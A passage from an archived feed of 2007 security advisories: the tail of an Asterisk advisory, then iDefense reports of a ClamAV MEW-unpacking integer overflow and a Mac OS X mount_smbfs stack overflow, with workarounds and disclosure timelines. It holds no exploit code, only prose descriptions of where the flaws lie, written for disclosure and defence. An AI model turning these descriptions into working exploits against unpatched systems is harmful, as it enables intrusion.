&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; Series &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Asterisk Open Source &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.0.x &amp;nbsp; &amp;nbsp;| Not affected &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Asterisk Open Source &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.2.x &amp;nbsp; &amp;nbsp;| All versions prior to &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | 1.2.26 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Asterisk Open Source &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.4.x &amp;nbsp; &amp;nbsp;| All versions prior to &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | 1.4.16 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Asterisk Business Edition &amp;nbsp;| &amp;nbsp; &amp;nbsp;A.x.x &amp;nbsp; &amp;nbsp;| Not affected &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Asterisk Business Edition &amp;nbsp;| &amp;nbsp; &amp;nbsp;B.x.x &amp;nbsp; &amp;nbsp;| All versions prior to &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | B.2.3.6 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Asterisk Business Edition &amp;nbsp;| &amp;nbsp; &amp;nbsp;C.x.x &amp;nbsp; &amp;nbsp;| All versions prior to &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | C.1.0-beta8 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;AsteriskNOW &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | pre-release | Not affected &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; Asterisk Appliance &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp;0.x.x &amp;nbsp; &amp;nbsp;| Not affected &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; Developer Kit &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| s800i (Asterisk Appliance) | &amp;nbsp; &amp;nbsp;1.0.x &amp;nbsp; &amp;nbsp;| Not affected &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Corrected In &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Product &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Release &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Open Source &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1.2.26 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Open Source &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1.4.16 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Business Edition &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;B.2.3.6 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Business Edition &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;C.1.0-beta8 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Links &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Asterisk Project Security Advisories are posted at &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &lt;a href=&quot;http://www.asterisk.org/security&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.asterisk.org/security&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| This document may be superseded by later versions; if so, the latest &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| version will be posted at &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &lt;a href=&quot;http://downloads.digium.com/pub/security/AST-2007-027.pdf&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://downloads.digium.com/pub/security/AST-2007-027.pdf&lt;/a&gt;&amp;nbsp;and &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &lt;a href=&quot;http://downloads.digium.com/pub/security/AST-2007-027.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://downloads.digium.com/pub/security/AST-2007-027.html&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Revision History &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp;Date &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Editor &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; Revisions Made &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-----------------+------------------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| 2007-12-18 &amp;nbsp; &amp;nbsp; &amp;nbsp;| Tilghman Lesher &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| Initial Release &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Asterisk Project Security Advisory - AST-2007-027
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Copyright (c) 2007 Digium, Inc. All Rights Reserved.
&lt;br&gt;&amp;nbsp; Permission is hereby granted to distribute and publish this advisory in its
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;original, unaltered form.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/AST-2007-027---Database-matching-order-permits-host-based-authentication-to-be-ignored-tp14443915p14443915.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14442302</id>
	<title>iDefense Security Advisory 12.18.07: ClamAV libclamav MEW PE File Integer Overflow Vulnerability</title>
	<published>2007-12-18T10:26:49Z</published>
	<updated>2007-12-18T10:26:49Z</updated>
	<author>
		<name>iDefense Labs</name>
	</author>
	<content type="html">iDefense Security Advisory 12.18.07
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/intelligence/vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/intelligence/vulnerabilities/&lt;/a&gt;&lt;br&gt;Dec 18, 2007
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;&lt;br&gt;Clam AntiVirus is a multi-platform anti-virus toolkit released under the
&lt;br&gt;GNU Public License. ClamAV is often integrated into e-mail gateways and
&lt;br&gt;used to scan e-mail messages for viruses. PE, or portable executable,
&lt;br&gt;is the executable file format on Microsoft Windows systems. MEW is one
&lt;br&gt;of the many executable packers that is supported by ClamAV. More
&lt;br&gt;information can be found on the vendor's website at the following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.clamav.net/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.clamav.net/&lt;/a&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Remote exploitation of an integer overflow vulnerability in Clam
&lt;br&gt;AntiVirus' ClamAV, as included in various vendors' operating system
&lt;br&gt;distributions, allows attackers to execute arbitrary code with the
&lt;br&gt;privileges of the affected process.
&lt;br&gt;&lt;br&gt;The vulnerability exists within the code responsible for parsing PE
&lt;br&gt;files packed with the MEW packer. During unpacking, two untrusted
&lt;br&gt;values are taken directly from the file without being validated. These
&lt;br&gt;values are later used in an arithmetic operation to calculate the size
&lt;br&gt;used to allocate a heap buffer. This calculation can overflow,
&lt;br&gt;resulting in a buffer of insufficient size being allocated. This later
&lt;br&gt;leads to arbitrary areas of memory being overwritten with attacker
&lt;br&gt;supplied data.
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Exploitation of this vulnerability results in the execution of arbitrary
&lt;br&gt;code with the privileges of the process using libclamav.
&lt;br&gt;&lt;br&gt;In the case of the clamd program, this will result in code execution
&lt;br&gt;with the privileges of the clamav user. Unsuccessful exploitation
&lt;br&gt;results in the clamd process crashing.
&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;iDefense has confirmed the existence of this vulnerability in ClamAV
&lt;br&gt;0.91.2. Previous versions may also be affected.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;Disabling the scanning of PE files will prevent exploitation. If using
&lt;br&gt;clamscan, this can be done by running clamscan with the '--no-pe'
&lt;br&gt;option. If using clamdscan, set the 'ScanPE' option in the clamd.conf
&lt;br&gt;file to 'no'.
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;The ClamAV team has addressed this vulnerability within version 0.92.
&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2007-5759 to this issue. This is a candidate for inclusion in
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;10/17/2007 &amp;nbsp;Initial vendor notification
&lt;br&gt;10/18/2007 &amp;nbsp;Initial vendor response
&lt;br&gt;12/18/2007 &amp;nbsp;Coordinated public disclosure
&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;The discoverer of this vulnerability wishes to remain anonymous.
&lt;br&gt;&lt;br&gt;Get paid for vulnerability research
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/methodology/vulnerability/vcp.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;Free tools, research and upcoming events
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright © 2007 iDefense, Inc.
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without the express
&lt;br&gt;written consent of iDefense. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please e-mail &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14442302&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;customerservice@...&lt;/a&gt; for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;&amp;nbsp;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct,
&lt;br&gt;indirect, or consequential loss or damage arising from use of, or
&lt;br&gt;reliance on, this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/iDefense-Security-Advisory-12.18.07%3A-ClamAV-libclamav-MEW-PE-File-Integer-Overflow-Vulnerability-tp14442302p14442302.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14440670</id>
	<title>iDefense Security Advisory 12.17.07: Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Vulnerability</title>
	<published>2007-12-18T10:25:39Z</published>
	<updated>2007-12-18T10:25:39Z</updated>
	<author>
		<name>iDefense Labs</name>
	</author>
	<content type="html">iDefense Security Advisory 12.17.07
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/intelligence/vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/intelligence/vulnerabilities/&lt;/a&gt;&lt;br&gt;Dec 17, 2007
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;&lt;br&gt;The mount_smbfs utility is used to mount a remote SMB share locally. It
&lt;br&gt;is installed set-uid root, so as to allow unprivileged users to mount
&lt;br&gt;shares, and is present in a default installation on both the Server and
&lt;br&gt;Desktop versions of Mac OS X. For more information visit the following
&lt;br&gt;URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://developer.apple.com/documentation/Darwin/Reference/ManPages/man8/mount_smbfs.8.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://developer.apple.com/documentation/Darwin/Reference/ManPages/man8/mount_smbfs.8.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Local exploitation of a stack based buffer overflow vulnerability in
&lt;br&gt;Apple Inc.'s Mac OS X mount_smbfs utility could allow an attacker to
&lt;br&gt;execute arbitrary code with root privileges.
&lt;br&gt;&lt;br&gt;The vulnerability exists in a portion of code responsible for parsing
&lt;br&gt;command line arguments. When processing the -W option, which is used to
&lt;br&gt;specify a workgroup name, the option's argument is copied into a fixed
&lt;br&gt;sized stack buffer without any checks on its length. This leads to a
&lt;br&gt;trivially exploitable stack based buffer overflow.
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Exploitation of this vulnerability results in the execution of arbitrary
&lt;br&gt;code with root privileges. In order to exploit this vulnerability, an
&lt;br&gt;attacker must have execute permission for the set-uid root mount_smbfs
&lt;br&gt;binary.
&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;iDefense has confirmed the existence of this vulnerability in Mac OS X
&lt;br&gt;version 10.4.10, on both the Server and Desktop versions. Previous
&lt;br&gt;versions may also be affected.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;Removing the set-uid bit from the mount_smbfs binary will prevent
&lt;br&gt;exploitation. However, non-root users will be unable to use the
&lt;br&gt;program.
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;Apple addressed this vulnerability within their Mac OS X 2007-009
&lt;br&gt;security update. More information is available at the following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://docs.info.apple.com/article.html?artnum=307179&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://docs.info.apple.com/article.html?artnum=307179&lt;/a&gt;&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2007-3876 to this issue. This is a candidate for inclusion in
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;07/16/2007 &amp;nbsp;Initial vendor notification
&lt;br&gt;07/17/2007 &amp;nbsp;Initial vendor response
&lt;br&gt;12/17/2007 &amp;nbsp;Coordinated public disclosure
&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;This vulnerability was discovered by Sean Larsson of VeriSign iDefense
&lt;br&gt;Labs.
&lt;br&gt;&lt;br&gt;Get paid for vulnerability research
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/methodology/vulnerability/vcp.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;Free tools, research and upcoming events
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright © 2007 iDefense, Inc.
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without the express
&lt;br&gt;written consent of iDefense. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please e-mail &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14440670&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;customerservice@...&lt;/a&gt; for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;&amp;nbsp;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct,
&lt;br&gt;indirect, or consequential loss or damage arising from use of, or
&lt;br&gt;reliance on, this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/iDefense-Security-Advisory-12.17.07%3A-Apple-Mac-OS-X-mount_smbfs-Stack-Based-Buffer-Overflow-Vulnerability-tp14440670p14440670.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14341796</id>
	<title>iDefense Security Advisory 12.11.07: Microsoft DirectX 7 and 8 DirectShow Stack Buffer Overflow Vulnerability</title>
	<published>2007-12-12T11:47:20Z</published>
	<updated>2007-12-12T11:47:20Z</updated>
	<author>
		<name>iDefense Labs</name>
	</author>
	<content type="html">iDefense Security Advisory 12.11.07
